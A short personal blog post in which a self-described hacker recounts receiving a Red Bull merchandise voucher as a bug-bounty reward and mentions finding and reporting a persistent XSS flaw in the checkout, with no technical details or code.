Reward update

This was great news to me as I really wanted to get some nice Red Bull Formula 1 merchandise and I felt that this amount will be enough for a couple items from their shop.

Mark was amazing to deal with and he got me the voucher, I'll admit I couldn't help myself but to mess around with a couple burp requests and check out how this voucher worked. I couldn't really do much to fool the system in any way, especially with my little knowledge about APIs, however I found a point where I could inject js/html and achieve persistent XSS during the checkout process. I've informed Mark about it, he replied back that they are already working on it as it has been reported by a previous individual. I then placed the order, it was delivered to me fast even though I only used regular delivery 'free'!

A couple thoughts I'd like to share about Red Bull. I wasn't aware of how big this company is until now, and just how many events they are involved in trust me when I say Red bull is huge.

This blog post is not sponsored!

I am glad that I got my first bounty from Red Bull because the company was really nice to deal with and they were quick in their correspondence, also Mark was very pleasant to engage with.

Red Bull is currently working on a BugBounty program, so they can track, and send non-monetary rewards out to everyone who earned it.

Have you got any suggestions for me ? Get in touch!

Thank you for reading my article, Until next time!

Your friendly neighbourhood Hacker.